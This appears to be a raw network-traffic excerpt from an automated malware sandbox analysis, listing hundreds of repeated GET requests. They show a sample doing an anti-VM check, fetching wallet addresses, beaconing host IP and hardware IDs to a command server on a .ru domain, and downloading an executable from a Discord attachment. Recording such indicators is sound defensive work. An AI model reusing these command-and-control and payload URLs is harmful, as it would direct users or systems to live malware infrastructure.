        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //antivm.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/x86/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /dlls/x64/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //dd.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //ferr.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=eth HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=eth HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /getwallet.php?id=1081&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
